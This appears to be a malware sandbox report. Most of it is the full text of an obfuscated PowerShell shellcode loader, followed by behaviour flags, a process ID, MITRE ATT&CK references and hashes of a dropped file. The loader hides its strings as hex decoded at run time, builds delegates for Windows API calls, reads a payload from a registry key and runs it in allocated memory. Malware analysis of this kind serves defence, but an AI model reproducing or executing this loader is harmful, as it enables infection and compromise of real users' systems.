'979196B5A0A6ACA4A98BA4A8A0E9E58DACA1A087BC96ACA2E9E595B0A7A9ACA6';$Purivsigte7=Keltisk0 '97B0ABB1ACA8A0E9E588A4ABA4A2A0A1';$Purivsigte8=Keltisk0 '97A0A3A9A0A6B1A0A181A0A9A0A2A4B1A0';$Purivsigte9=Keltisk0 '8CAB88A0A8AAB7BC88AAA1B0A9A0';$Apology0=Keltisk0 '88BC81A0A9A0A2A4B1A091BCB5A0';$Apology1=Keltisk0 '86A9A4B6B6E9E595B0A7A9ACA6E9E596A0A4A9A0A1E9E584ABB6AC86A9A4B6B6E9E584B0B1AA86A9A4B6B6';$Apology2=Keltisk0 '8CABB3AAAEA0';$Apology3=Keltisk0 '95B0A7A9ACA6E9E58DACA1A087BC96ACA2E9E58BA0B296A9AAB1E9E593ACB7B1B0A4A9';$Apology4=Keltisk0 '93ACB7B1B0A4A984A9A9AAA6';$Apology5=Keltisk0 'ABB1A1A9A9';$Apology6=Keltisk0 '8BB195B7AAB1A0A6B193ACB7B1B0A4A988A0A8AAB7BC';$Apology7=Keltisk0 '8C809D';$Apology8=Keltisk0 '99';$Carinulate=Keltisk0 '90968097F6F7';$Jeropiga=Keltisk0 '86A4A9A992ACABA1AAB295B7AAA684';function fkp {Param ($Endangers, $Minionly) ;$Firmaflasker0 =Keltisk0 
'E1AEAAABA6ACB5A0B7ACABA2A0ABB6E5F8E5ED9E84B5B581AAA8A4ACAB98FFFF86B0B7B7A0ABB181AAA8A4ACABEB82A0B184B6B6A0A8A7A9ACA0B6EDECE5B9E592ADA0B7A0E88AA7AFA0A6B1E5BEE5E19AEB82A9AAA7A4A984B6B6A0A8A7A9BC86A4A6ADA0E5E884ABA1E5E19AEB89AAA6A4B1ACAAABEB96B5A9ACB1EDE184B5AAA9AAA2BCFDEC9EE8F498EB80B4B0A4A9B6EDE195B0B7ACB3B6ACA2B1A0F5ECE5B8ECEB82A0B191BCB5A0EDE195B0B7ACB3B6ACA2B1A0F4EC';&($Apology7) $Firmaflasker0;$Firmaflasker5 = Keltisk0 'E18DA4B1A6ADE5F8E5E1AEAAABA6ACB5A0B7ACABA2A0ABB6EB82A0B188A0B1ADAAA1EDE195B0B7ACB3B6ACA2B1A0F7E9E59E91BCB5A09E9898E585EDE195B0B7ACB3B6ACA2B1A0F6E9E5E195B0B7ACB3B6ACA2B1A0F1ECEC';&($Apology7) $Firmaflasker5;$Firmaflasker1 = Keltisk0 'B7A0B1B0B7ABE5E18DA4B1A6ADEB8CABB3AAAEA0EDE1ABB0A9A9E9E585ED9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A398ED8BA0B2E88AA7AFA0A6B1E596BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A3EDED8BA0B2E88AA7AFA0A6B1E58CABB195B1B7ECE9E5EDE1AEAAABA6ACB5A0B7ACABA2A0ABB6EB82A0B188A0B1ADAAA1EDE195B0B7ACB3B6ACA2B1A0F0ECECEB8CABB3AAAEA0EDE1ABB0A9A9E9E585EDE180ABA1A4ABA2A0B7B6ECECECECE9E5E188ACABACAAABA9BCECEC';&($Apology7) $Firmaflasker1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Forehook,[Parameter(Position = 1)] [Type] $Eksposeer = [Void]);$Firmaflasker2 = Keltisk0 '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';&($Apology7) $Firmaflasker2;$Firmaflasker3 = Keltisk0 'E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB81A0A3ACABA086AAABB6B1B7B0A6B1AAB7EDE195B0B7ACB3B6ACA2B1A0F3E9E59E96BCB6B1A0A8EB97A0A3A9A0A6B1ACAAABEB86A4A9A9ACABA286AAABB3A0ABB1ACAAABB698FFFF96B1A4ABA1A4B7A1E9E5E183AAB7A0ADAAAAAEECEB96A0B18CA8B5A9A0A8A0ABB1A4B1ACAAAB83A9A4A2B6EDE195B0B7ACB3B6ACA2B1A0F2EC';&($Apology7) $Firmaflasker3;$Firmaflasker4 = Keltisk0 
'E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB81A0A3ACABA088A0B1ADAAA1EDE184B5AAA9AAA2BCF7E9E5E184B5AAA9AAA2BCF6E9E5E180AEB6B5AAB6A0A0B7E9E5E183AAB7A0ADAAAAAEECEB96A0B18CA8B5A9A0A8A0ABB1A4B1ACAAAB83A9A4A2B6EDE195B0B7ACB3B6ACA2B1A0F2EC';&($Apology7) $Firmaflasker4;$Firmaflasker5 = Keltisk0 'B7A0B1B0B7ABE5E184A3B6B1ACB3ABACABA2B6B1A8A8A0B7B6EB86B7A0A4B1A091BCB5A0EDEC';&($Apology7) $Firmaflasker5 ;}$Autonomiseret = Keltisk0 'AEA0B7ABA0A9F6F7';$Firmaflasker6 = Keltisk0 'E191A4A9A0B1ACA1A0ABB6E5F8E59E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF82A0B181A0A9A0A2A4B1A083AAB783B0ABA6B1ACAAAB95AAACABB1A0B7EDEDA3AEB5E5E184B0B1AAABAAA8ACB6A0B7A0B1E5E184B5AAA9AAA2BCF1ECE9E5ED828191E585ED9E8CABB195B1B798E9E59E908CABB1F6F798E9E59E908CABB1F6F798E9E59E908CABB1F6F798ECE5ED9E8CABB195B1B798ECECEC';&($Apology7) $Firmaflasker6;$Sknneste = fkp $Apology5 $Apology6;$Firmaflasker7 = Keltisk0 'E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E5F8E5E191A4A9A0B1ACA1A0ABB6EB8CABB3AAAEA0ED9E8CABB195B1B798FFFF9FA0B7AAE9E5F3F0F1E9E5F5BDF6F5F5F5E9E5F5BDF1F5EC';&($Apology7) $Firmaflasker7;$Firmaflasker8 = Keltisk0 'E187AAB1A4ABACB6A0B6E5F8E5E191A4A9A0B1ACA1A0ABB6EB8CABB3AAAEA0ED9E8CABB195B1B798FFFF9FA0B7AAE9E5FDF1FDFCF6F3FCF3E9E5F5BDF6F5F5F5E9E5F5BDF1EC';&($Apology7) $Firmaflasker8;$Sculpturesquely00='HKCU:\Adeste\Saltets';$Sculpturesquely01 =Keltisk0 'E196B0A9B1A0B6B1B7A0AFAEA0B7ABA0F8ED82A0B1E88CB1A0A895B7AAB5A0B7B1BCE5E895A4B1ADE5E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF5F5ECEB80A3B1A0B7B0A1A1A4ABABA0';&($Apology7) $Sculpturesquely01;$Firmaflasker9 = Keltisk0 'E183ACB7A8A4A3A9A4B6AEA0B7E5F8E59E96BCB6B1A0A8EB86AAABB3A0B7B198FFFF83B7AAA887A4B6A0F3F196B1B7ACABA2EDE196B0A9B1A0B6B1B7A0AFAEA0B7ABA0EC';&($Apology7) $Firmaflasker9;$Sultestrejkerne0 = Keltisk0 '9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF86AAB5BCEDE183ACB7A8A4A3A9A4B6AEA0B7E9E5F5E9E5E5E196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E9E5F3F0F1EC';&($Apology7) 
$Sultestrejkerne0;$Apologizer=$Firmaflasker.count-654;$Sultestrejkerne1 = Keltisk0 '9E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF86AAB5BCEDE183ACB7A8A4A3A9A4B6AEA0B7E9E5F3F0F1E9E5E187AAB1A4ABACB6A0B6E9E5E184B5AAA9AAA2ACBFA0B7EC';&($Apology7) $Sultestrejkerne1;$Sultestrejkerne2 = Keltisk0 'E184B6BCA8B5B1AAB1A0ABB6E5F8E59E96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB88A4B7B6ADA4A998FFFF82A0B181A0A9A0A2A4B1A083AAB783B0ABA6B1ACAAAB95AAACABB1A0B7EDEDA3AEB5E5E186A4B7ACABB0A9A4B1A0E5E18FA0B7AAB5ACA2A4ECE9E5ED828191E585ED9E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798E9E59E8CABB195B1B798ECE5ED9E8CABB195B1B798ECECEC';&($Apology7) $Sultestrejkerne2;$Sultestrejkerne3 = Keltisk0 'E184B6BCA8B5B1AAB1A0ABB6EB8CABB3AAAEA0EDE196A6B0A9B5B1B0B7A0B6B4B0A0A9BCF6E9E187AAB1A4ABACB6A0B6E9E196AEABABA0B6B1A0E9F5E9F5EC';&($Apology7) $Sultestrejkerne3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1516
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X837EZ1RVUB0PBB6YPO6.temp
Filesize: 7KB
MD5: 72108fa469b6ed4b77d50ff17339d188
SHA1: 40a7a38b29cc3cd6e2a53d292e6c195e3587ad38
SHA256: b7cc350ca1a75d8cd8375e3852f416f9390efe2082bf76beeefec91f17ff885b
SHA512: 74d446d1aee288d50ee0952c399f2306a23ffda69ff22529538c1fbf4de52298332f2e80e96983d7eeb01ac3d9e6ea8e9c6b41ef6f4c06dfe32d4d0884e75df4